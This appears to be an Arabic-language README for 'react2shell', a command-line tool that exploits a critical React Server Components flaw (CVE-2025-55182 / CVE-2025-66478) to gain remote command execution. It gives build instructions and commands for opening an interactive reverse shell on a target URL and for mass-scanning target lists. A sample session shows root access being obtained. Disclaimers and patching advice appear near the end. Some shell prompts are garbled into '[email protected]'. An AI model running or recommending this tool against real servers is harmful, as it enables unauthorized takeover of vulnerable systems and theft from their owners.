
أداة سطر أوامر تستغل الثغرات في React Server Components وServer Actions (CVE-2025-55182, CVE-2025-66478) لتحقيق تنفيذ الأوامر عن بُعد (RCE) على الخوادم الضعيفة.
أداة CLI لاستغلال ثغرات تلوث النموذج الأولي في React Server Components / Server Actions (CVE-2025-55182 & CVE-2025-66478)، مما يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE) على الخوادم الضعيفة.
الإثبات الأصلي (PoC) : https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc
تحذير: هذه الأداة تستهدف ثغرة حرجة (CVSS 10.0) يتم استغلالها بنشاط في البيئة الحقيقية. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
هذه الأداة مخصصة فقط للأغراض التعليمية، واختبارات الأمان المصرح بها، واختبارات الاختراق بإذن، وأبحاث الثغرات.
المؤلف والمساهمون لا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر أو عواقب قانونية ناتجة عن استخدام هذه الأداة. أنت مسؤول بالكامل عن ضمان امتثال استخدامك لجميع القوانين واللوائح وشروط الخدمة المعمول بها.
الاستخدام غير المصرح به ضد الأنظمة دون إذن غير قانوني في معظم الولايات القضائية وقد يؤدي إلى عقوبات شديدة.
git clone https://github.com/mantvmass/react2shell.git
cd react2shell
cargo build --release
سيكون الملف الثنائي في target/release/react2shell (أو react2shell.exe على ويندوز).
قم بالتحميل من صفحة الإصدارات.
react2shell [COMMAND] [SOURCE]
open <URL>: فتح شل عكسية تفاعلية على الهدف (إذا كان ضعيفاً).scan <FILE>: فحص قائمة أهداف من ملف (رابط واحد لكل سطر) بحثاً عن الثغرة.# فتح شل تفاعلية
react2shell open http://vulnerable-target.com
# فحص أهداف متعددة
react2shell scan targets.txt
# فحص هدف واحد
react2shell scan http://127.0.0.1:3000
[email protected]:3000 (js)
$ /help # عرض جميع الأوامر المدعومة
Commands;
/new <URL> ; تبديل رابط الهدف # تبديل رابط الهدف
/use exec ; تنفيذ الأمر وانتظار الناتج # التبديل إلى وضع exec (ينتظر النتيجة)
/use exec-no-wait ; تنفيذ الأمر دون انتظار # وضع exec دون انتظار الناتج
/use js ; تنفيذ كود JavaScript # العودة إلى وضع JavaScript
/set timeout <ms> ; تعيين مهلة الأمر بالميلي ثانية # تكوين مهلة الأمر
/show options ; عرض الإعدادات الحالية # عرض إعدادات الشل الحالية
/clear ; مسح الشاشة # مسح شاشة الطرفية
/exit or /quit ; الخروج من الشل # الخروج من الشل التفاعلية
Examples;
ls -la # مثال لأمر لينكس
whoami # عرض مستخدم النظام الحالي
console.log('Hello') # مثال لأمر JavaScript
[email protected]:3000 (js)
$ /use exec # التبديل من وضع JS إلى وضع exec
[+] Switch shell mode to exec
[email protected]:3000 (exec)
$ whoami # التحقق من المستخدم المنفذ الحالي
root # ناتج الأمر
التطبيقات التي تستخدم React Server Components مع App Router تكون متأثرة عند تشغيل الإصدارات التالية:
ما يلي غير متأثر:
الثغرة موجودة في إصدارات React 19.0, 19.1.0, 19.1.1, و 19.2.0 ضمن الحزم التالية:
react-server-dom-webpackreact-server-dom-parcelreact-server-dom-turbopackيوصى بشدة بالترقية الفورية إلى الإصدارات المصححة، خاصةً لبيئات الإنتاج.
الإصلاح الأساسي هو الترقية إلى الإصدارات المصححة من React و Next.js.
لتطبيقات Next.js، استخدم أداة الإصلاح الآلي الرسمية:
npx fix-react2shell-next
مزيد من المعلومات: vercel-labs/fix-react2shell-next
انظر الإعلانات الرسمية:
تم إصدار هذا المشروع للأغراض التعليمية وأبحاث الأمن المصرح بها فقط. تقع المسؤولية الكاملة للاستخدام على عاتق المستخدم النهائي.